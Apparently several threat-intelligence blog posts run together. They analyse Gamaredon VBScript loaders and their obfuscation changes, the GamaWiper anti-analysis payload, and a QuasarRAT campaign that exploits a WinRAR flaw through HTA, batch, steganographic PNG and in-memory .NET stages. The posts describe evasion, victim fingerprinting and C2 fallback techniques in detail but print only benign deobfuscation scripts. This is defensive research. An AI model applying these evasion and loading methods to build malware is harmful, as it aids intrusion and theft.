Domain age Newly registered domains should be treated different from domains that have existed for years. Many Gamaredon delivery endpoints fall into the “new/very new” category.
Provider patterns Certain DynDNS and free subdomain services appear repeatedly across campaigns.
Subdomain churn Rapidly changing subdomains under the same parent domain are a common pattern. This is not normal behavior for most legitimate services used by end users.
NXDOMAIN spikes Failed dns lookups shortly before successful connections can indicate scripted discovery or fallback logic inside loaders. Since this is very common, you can use this as a strong pattern for finding Gamaredon related activity. You can detect it, even if timeouts and sleeps are enabled.
None of these signals alone prove malicious intent itself, but together they describe infrastructure behavior that is/could be highly consistent with how Gamaredon operates. Once this dynamic is understood, the operational flexibility that makes Gamaredon effective becomes a liability that defenders can exploit 🙂
Restriction Beats Blacklisting
If possible, access to high-risk DNS categories have to be restricted by policy, not just monitored.
This can include:
blocking or limiting known DynDNS providers
forcing additional inspection or logging for low-reputation domains
isolating traffic to newly registered domains
The goal is not to eliminate all risk (that is unrealistic) but to reduce the attackers ability to operate entirely in disposable infrastructure without triggering any response.
Gamaredon depends on infrastructure that can be replaced quickly and cheaply. Defensive strategies have to make that approach operationally expensive instead of operationally invisible.
DNS Is Not Just Plumbing
In many environments, DNS is treated as a purely technical service: something that resolves names and moves on. From a threat detection perspective, that is a wasted opportunity.
DNS shows:
where systems are trying to go
how often endpoints change
whether communication targets look stable or disposable
Especially in script-driven infection chains, DNS can be the first external signal that something has moved from local execution to external communication.
If DNS data is not included in your detection logic, then a large portion of Gamaredon activity will look like harmless background traffic until much later in the attack chain.
In my opinion, proper DNS logging should always be included a defensive strategy, regardless of which threat actor you are dealing with.
Prepare for anti-analysis
One thing that becomes obvious to me when tracking Gamaredon over time is that they do not just try to avoid detection, they actively react to analysis.
Payload delivery and script behavior can change depending on the environment. Analysis systems may receive different payloads, broken samples or nothing at all, while real victims get fully functional stages. What you see in a sandbox is not always what happens in the wild.
This means relying on a single analysis setup is risky. If all samples run through the same sandbox, the same proxy and the same network profile, that environment becomes easy to fingerprint and easy to avoid.
Analysis systems should look as boring and realistic as possible.
The takeaway from my analysis is simple: when the attacker adapts to being observed, your analysis pipeline becomes part the attack surface. If you do not account for that, you may be analyzing exactly what the attacker wants you to see
More information
If you want to know more about Gamaredn, check out my latest articles:
In malware analysis, it is tempting to describe change as innovation. New tricks, new tooling, new malware families. What is far more revealing, however, is how little actually changes and what changes anyway.
Between late November and the end of December 2025, several Gamaredon-related VBScript loaders surfaced that are, functionally, almost identical. They all execute the same mechanism, rely on the same execution primitive, and ultimately aim for the same outcome.
And yet, something does change, quietly, incrementally, and very deliberately.
This article focuses strictly on observable, concrete shifts in obfuscation, not assumptions, not intent inferred from tooling, and not architectural leaps that are not supported by the samples themselves.
Hundreds of variables that are written to once and never read again
Repeated arithmetic mutations (x = x + 14) without semantic relevance
Long linear execution flow
No variable declarations (Dim entirely absent)
The obfuscation here serves one purpose only: syntactic noise.
There is no attempt to:
Hide control flow
Delay string resolution
Reconstruct logic conditionally
Everything is present in the source, just buried under irrelevant assignments.
From an analyst’s perspective, this sample is noisy but predictable. Once dead code is ignored, execution logic collapses into a short, linear sequence.
19 December 2025 – Indicator overload
The mid-December sample introduces a clear and measurable change: indicator density.
New observations:
A significant increase in hard-coded URLs
URLs pointing to unrelated, legitimate, and state-adjacent domains
No execution dependency on most of these URLs
Crucially, these URLs are not obfuscated. They are placed in plain sight.
This is not string hiding it is indicator flooding.
The obfuscation shift here is not technical complexity, but analytical friction:
Automated extraction produces dozens of false leads
IOC-based clustering becomes unreliable
Manual triage cost increases without changing execution logic
The loader still behaves linearly. What changes is the signal-to-noise ratio.
22 December 2025 – Defensive Reaction at the Payload Layer
The December 22 sample is not an obfuscation milestone, but it is a defensive one.
From a loader perspective, almost nothing changes:
The download URL is fully present and statically recoverable
No additional string hiding or control-flow manipulation is introduced
Execution remains linear and transparent
However, focusing solely on loader complexity misses the actual shift.
The real change happens at the payload layer
For the first time in this series, the loader delivers GamaWiper instead of Pterodo for Analysis environments.
This is not a neutral substitution.
As outlined in my earlier analysis of GamaWipers behavior, this payload is explicitly designed to:
Notably, this change occurs almost exactly four weeks after my article outlining practical approaches to tracking Gamaredon infrastructure went public. Whether coincidence or feedback loop, the timing aligns remarkably well with the first observed deployment of GamaWiper as an anti-analysis response.
25 December 2025 – Control-Flow Noise Appears
The Christmas sample does not introduce new primitives, but it does introduce execution ambiguity.
Concrete changes:
Multiple .Run invocations exist
Not all of them result in meaningful execution
Several objects and variables are constructed but never used
Execution order is less visually obvious
This is not branching logic, but control-flow camouflage.
The analyst can still reconstruct execution, but:
Dead paths look plausible
Execution sinks are no longer unique
Automated heuristics struggle to identify the real one
The obfuscation no longer targets strings, it targets execution clarity.
30 December 2025 – Fragmented Runtime Assembly
The final sample introduces the most tangible structural changes.
Observed differences:
Systematic use of Dim declarations
Extensive use of short, non-semantic string fragments
Assembly of execution-relevant strings via repeated concatenation across distant code sections
No complete execution string exists statically
Domains are just random invalid Domains
At no point does the full execution command exist as a contiguous value in the source.
Instead:
Fragments are combined
Recombined
Passed through intermediate variables
Finalized immediately before execution
This directly degrades:
Static string extraction
Signature-based detection
Regex-driven tooling
No encryption is added. The shift is purely architectural.
05 January 2026 – Added Datetime Parameter to URL
EDIT 07.01.2026: I added this part as new findings appeared
Since early January, another small but relevant change appeared in the loader logic.
The scripts now generate a date value at runtime:
This value is then embedded directly into the download path, resulting in URLs like:
From a detection standpoint, this is subtle but effective
This means:
payload paths change daily
static URL signatures age out immediately
and IOC reuse across campaigns becomes unreliable
Relation to Prior Observations
This behavior aligns closely with patterns discussed in my earlier article on GamaWiper and Gamaredon’s anti-analysis strategies, where delivery behavior adapts based on perceived execution context.
After my recent blog posts covering Gamaredon’s ongoing PterodoGraph campaign targeting Ukraine, and following almost a full month of silence in terms of newly observed malware samples, fresh activity has finally resurfaced.
New samples have appeared, along with reports pointing to a component now referred to as GamaWiper.
It is important to note that GamaWiper, or at least very similar scripts has already been observed in Gamaredon operations in previous months. From a purely technical standpoint, this functionality is therefore not entirely new.
What is new, however, is the context in which it is now being deployed.
In this article, I aim to shed some light on what GamaWiper actually is, why Gamaredon is actively delivering it at this stage of the infection chain, and what this shift tells us about the group’s current operational mindset. What initially appears to be just another destructive payload instead turns out to be a deliberate control mechanism, one that decides who receives the real malware and who gets wiped instead
I’ll keep this post a bit shorter and focus only on what’s new, so it doesnt get boring. If you’re looking for deeper technical details, please refer to my previous posts from 22.11.2025 and 13.11.2025, where I covered the core mechanics in depth.
For this analysis, I’m using my deobfuscated version of the sample, next time i’ll maybe show you how to deobfuscate Gamaredon Scripts manually in less then 10 minutes.
After downloading the latest Gamaredon malware sample, it immediately became obvious that the current variants differ noticeably from what we’ve seen before.
Note: I started writing YARA Rules for Gamaredons current samples, you can find them here.
Key Changes at a Glance
Junk URLs now closely resemble real payload delivery URLs
No full Pterodo payload is delivered anymore 🙁
Gamaredon has hardened the delivery of Pterodo samples
Infection Flow – What Changed?
After the user opens the RAR archive and infects their system, the behavior initially looks familiar. On reboot, the Pterodo sample is fetched again, but only if the client is geolocated in Ukraine, as already mentioned in my previous blog posts.
Previously, non-UA clients would simply receive:
an empty page, or
an empty file
Today, however, things look a bit different.
Instead, the client receives GamaWiper.
GamaWiper – Sandbox? Gone.
GamaWiper is essentially a sandbox / VM killer whose sole purpose is to prevent analysis environments from seeing anything useful.
In earlier campaigns, this wasn’t always handled very well. For example, when I used Hybrid-Analysis, it was trivial to extract:
Telegram channels
Graph URLs
infrastructure relationships
This was a classic infrastructure design flaw and a great example of what budget cuts can do to an APT operation 😄
Today, however, the approach is much simpler:
If a sandbox is detected -> wipe it
No telemetry, no infrastructure leaks, no fun.
If you are a doing legit malware research interested in (deobfuscated) Samples from Gamaredon, you can write me an email.
Initial Loader: “GamaLoad”
The initial loader, which I’ll refer to as GamaLoad, implements a multi-stage payload fetch mechanism with dynamically constructed URLs and headers. The goal is resilience: fetch stage two no matter what.
Note: All malicious domains have been removed.
Request Characteristics
Request Type
Method: GET
Client:msxml2.xmlhttp
Execution: synchronous
URL Structure
Each request fetches a randomly generated resource:
/<random>.<ext>
Random filename: 7-10 characters (a-z, 0-9)
Camouflage extensions, e.g.:
wmv
yuv
lgc
rm
jpeg
C2 Fallback Order
The script iterates through multiple sources until a valid payload is received:
Argument URL (if passed at execution)
Hardcoded fallback
Cloudflare Workers domain
Domain fetch using @ notation
Abuse of the URL userinfo field
Dynamic host via check-host.net
HTML parsing
live host extraction
Alternative domain (again using @ notation)
Registry-based URL
Once a working C2 is found, it is stored as a persistent C2 entry.
HTTP Headers
The request uses very explicit and intentionally crafted headers.
User-Agent
A browser-like string combined with a host fingerprint, including:
Computer name
Drive serial number (hex-encoded)
Timestamp
UTC+2
Ukrainian local time expected
Cookie
Static campaign identifier
Rotates regularly (more on that below)
Content-Length
Explicitly set
Even for GET requests
Enables victim identification & tracking Also plays a role in proxy evasion (see below)
Success Condition
A request is considered successful when:
HTTP status is 200
Response size is greater than 91 bytes
Once this condition is met, all remaining fallbacks are skipped.
Payload Processing
Payload received as binary
UTF-8 conversion
Cleanup (CR/LF, delimiters)
Base64 decoding
In-memory execution
No disk writes – classic fileless execution
Evasion Techniques
Multi-stage fallback logic
Dynamic hosts
Delays between requests
Victim-specific User-Agent
Below is an example of a fully constructed request header sent to the payload delivery host.
Payload Rotation
Gamaredon currently rotates payloads every 1-3 hours.
With each rotation, the following variables may change:
Domains for Payload Delivery
User-Agent
Cookie
Content-Length
Why Is Content-Length Set?
The Content-Length HTTP header specifies the size of the request or response body in bytes. Its typical purpose is:
Defining message boundaries
Preventing truncated reads
Enabling correct stream handling
In this case, however, I strongly believe the header is set intentionally for tracking and proxy evasion.
Why?
The loader uses msxml2.xmlhttp. When calling .send() via this client, the Content-Length header is not overwritten.
For a normal residential client, this is usually not an issue. However, many HTTP/HTTPS proxies, especially residential and chained proxies fail to handle this properly and may:
break the connection
modify the request
normalize headers
This behavior is highly detectable.
My conclusion: Gamaredon likely uses this mechanism to filter out proxy-based analysis setups. The choice of client and header behavior is far too specific to be accidental.
So, if you end up receiving GamaWiper instead of a payload, now you know why.
Conclusion
Gamaredon has clearly tightened its operational security.
The infrastructure flaws that previously allowed easy extraction of internal details have been addressed, and sandbox detection has shifted from “leaky but useful” to “wipe and move on”.
While these changes will certainly disrupt some tracking and automated analysis systems, the overall approach feels… let’s say pragmatic, but somewhat heavy-handed.
I am currently analyzing the recent surge of malware samples exploiting the WinRAR vulnerability CVE-2025-6218. During this research, I found a new sample on abuse.ch which appears to be part of a small QuasarRAT malware campaign.
What is CVE-2025-6218? (Short summary for this analysis)
After extracting the outer archive, we obtain another RAR file. Before unpacking it, we take a look at its contents in the hex view to check for anything suspicious.
xxd c67cc833d079aa60d662e2d5005b64340bb32f3b2f7d26e901ac0b1b33492f2f.rar| less
We can already see the suspicious ADS payload inside the RAR block. With this confirmation, we proceed to extract the archive using 7-Zip.
The script downloads an HTML Application (HTA) file from a GitHub repository. At the time of writing, both the repository and the user account have already been deleted. However, I uploaded a backup of the user’s repositories here.
Here is a screenshot of the repository and the associated profile:
Interestingly, the account only follows one inactive user with the Username “Levbohol / лев” :
Next, I inspected the verification.hta file that was downloaded from the repository.
The file contains a lightly obfuscated HTA script. I decoded the fromCharCode array into ASCII, resulting in the following code:
The script downloads yet another file named ilovelovelove.txt and executes it. Let’s take a closer look at that text file.
We are now looking at a heavily obfuscated DOS batch file. The first things that stand out are numerous variable assignments using set ... and comments prefixed with the REM keyword.
The comments are merely junk intended to distract the analyst. The variable assignments, however, are more complicated.
Some of the variables are never used anywhere in the script, these are clearly junk statements meant to confuse the reader. Other variables are used during execution and must be isolated and replaced with their actual runtime values. We also encounter various uninitialized variables, which are also junk, since they never carry a value.
Before proceeding, I remove all comments from the file.
sed -i '/^[Rr][Ee][Mm]/d' ilovelovelove.txt
Next, I isolate all variables that can be identified as junk, meaning variables that are referenced but never assigned a value.
grep -oE '%[^%]+%' ilovelovelove.txt > isolated_set_commands.txt
while read -r line;
do x=$(echo "$line" | sed 's/%//g'); res="$(grep $x ilovelovelove.txt | wc -l)"
if [ $res -lt 2 ];
then echo "$line";
fi
done < isolated_set_commands.txt >> removable.txt
rm isolated_set_commands.txt
I then remove all uninitialized variables from the script completely.
while read -r line; do sed -i "s|$line||g" ilovelovelove.txt; done < removable.txt
The script is now much cleaner, but some junk variables still remain. These were not properly filtered out because they were detected as variable placeholders inside strings. To handle this, we isolate them and remove any variable that does not have a corresponding set assignment.
I also found many Base64 strings in the script, but none of them appear to form recognizable structures at this point, so we ignore them for now. Next, we replace every remaining variable with its assigned value.
For this purpose, I wrote a small helper script:
#!/bin/bash
grep -oE '%[^%]+%' ilovelovelove_copy.txt > usable.txt
while read -r line; do
fstr="$(echo $line | sed 's/%//g')"
x=$(grep "set $fstr" ilovelovelove_copy.txt | wc -l)
if [ $x -lt 1 ]; then
sed -i "s|$line||g" ilovelovelove_copy.txt
continue
fi
value=$(grep "set $fstr" ilovelovelove_copy.txt | cut -d'=' -f2 )
echo "$line $value"
clean_line=$(echo -n "$line")
clean_value=$(echo -n "$value")
sed -i "s|$clean_line|$clean_value|g" ilovelovelove_copy.txt
done < usable.txt
After running the helper script, the cleaned batch script now looks like this:
After removing all ^M carriage returns, we obtain the following finalized version:
The script queries root\SecurityCenter2 via WMI to identify installed antivirus solutions. Depending on the detected product, it downloads different Base64-encoded payloads, decodes them, and executes them in memory using Invoke-Expression.
2. Downloading a hidden payload from a PNG file
Regardless of the antivirus result, the script then downloads a PNG image from a remote URL. This PNG contains embedded binary data stored inside pixel values (steganography).
The script:
reads each pixel,
reconstructs byte arrays from RGB values,
uses two pixels as payload length markers,
extracts the payload portion,
decompresses it via GZIP.
The result is a .NET assembly (DLL) extracted directly into memory.
3. Reflective loading of the DLL
The DLL is never written to disk. Instead, it is:
loaded directly into memory,
executed via .NET reflection,
its entry point is invoked (with or without parameters).
This technique avoids leaving artifacts on disk and bypasses many detection mechanisms.
4. Execution of the final malware payload
The final payload, typically a stealer or remote-control module, runs fully in memory.
A quick VirusTotal scan provides additional details:
VirusTotal classifies the malware as Zusy (also known as Barys). Zusy is an older but still active family of Windows malware. It has appeared for many years in small-scale campaigns and is typically used to steal credentials, browser information, or banking data. It is written in native C/C++, to confirm this i’ll take a look into the file with Ghidra.
When analyzing a binary in Ghidra, the presence of functions named .ctor or .cctor is a strong indicator that the file contains .NET managed code. These method names come directly from the Common Language Runtime (CLR) and follow the naming conventions defined by theECMA-335 Common Language Infrastructure (CLI)specification.
This indicates that we are not dealing with a typical Zusy malware sample, as Zusy does not use .NET managed code in any part of its execution chain.
I also uploaded the file to abuse.ch, where it was classified as “QuasarRAT”. This classification makes sense, as QuasarRAT is a remote access trojan written entirely in .NET.
QuasarRAT is a well-known open-source Windows remote access tool that has been abused by cybercriminals for years. It provides features such as keylogging, credential theft, file management, remote command execution, and real-time system monitoring. Because it is written in .NET, it is frequently modified, repacked, or extended by threat actors, making it easy to customize and embed into multi-stage loaders.
It is also interesting to examine the domains contacted by the malware.
The malware first retrieves the host’s public IP address using ipwho.is, and then contacts its command-and-control (C2) server hosted on the domain: